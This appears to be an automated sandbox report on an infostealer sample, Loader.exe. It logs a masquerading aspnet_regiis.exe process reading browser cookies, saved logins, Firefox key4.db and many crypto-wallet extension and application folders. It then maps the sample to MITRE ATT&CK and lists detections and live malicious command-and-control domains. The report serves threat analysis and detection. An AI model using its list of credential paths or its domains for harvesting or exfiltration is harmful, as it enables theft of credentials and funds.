              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflа
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: Yara matchFile source: 00000003.00000002.2236456187.0000000003620000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 2096, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: aspnet_regiis.exe PID: 2096, type: MEMORYSTR
              Source: Yara match | File source: sslproxydump.pcap, type: PCAP
              MITRE ATT&CK Matrix (one entry per tactic column; the number in parentheses is the count the report shows next to that technique, and entries without a number are the unmatched matrix cells)

              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
              Execution: Windows Management Instrumentation (2); PowerShell (1); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
              Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
              Privilege Escalation: Process Injection (311); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
              Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (131); Process Injection (311); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (4); Software Packing (12); DLL Side-Loading (1)
              Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
              Discovery: System Time Discovery (1); Security Software Discovery (131); Process Discovery (1); Virtualization/Sandbox Evasion (131); File and Directory Discovery (11); System Information Discovery (33); Remote System Discovery; System Owner/User Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
              Collection: Screen Capture (1); Archive Collected Data (1); Data from Local System (31); Clipboard Data (2); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
              Command and Control: Encrypted Channel (21); Non-Application Layer Protocol (2); Application Layer Protocol (113); Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
              Source | Detection | Scanner | Label | Link
              Loader.exe | 42% | ReversingLabs | Win32.Dropper.Jalapeno
              Loader.exe | 100% | Avira | HEUR/AGEN.1310947
              Loader.exe | 100% | Joe Sandbox ML
              Source | Detection | Scanner | Label | Link
              C:\Users\user\AppData\Roaming\gdi32.dll | 100% | Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
              https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
              http://crl.rootca1.amazontrust.com/rootca1.crl0 | 0% | URL Reputation | safe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
              https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0% | URL Reputation | safe
              https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
              http://x1.c.lencr.org/0 | 0% | URL Reputation | safe
              http://x1.i.lencr.org/0 | 0% | URL Reputation | safe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
              http://crt.rootca1.amazontrust.com/rootca1.cer0? | 0% | URL Reputation | safe
              https://support.mozilla.org/products/firefoxgro.all | 0% | URL Reputation | safe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              mafnufacut.cyou | 104.21.41.158 | true | true | | unknown
              Name | Malicious | Antivirus Detection | Reputation
              servicedny.site | true | | unknown
              https://mafnufacut.cyou/api | true | | unknown
              goalyfeastz.site | true | | unknown
              contemteny.site | true | | unknown
              opposezmny.site | true | | unknown
              authorisev.site | true | | unknown
              faulteyotk.site | true | | unknown
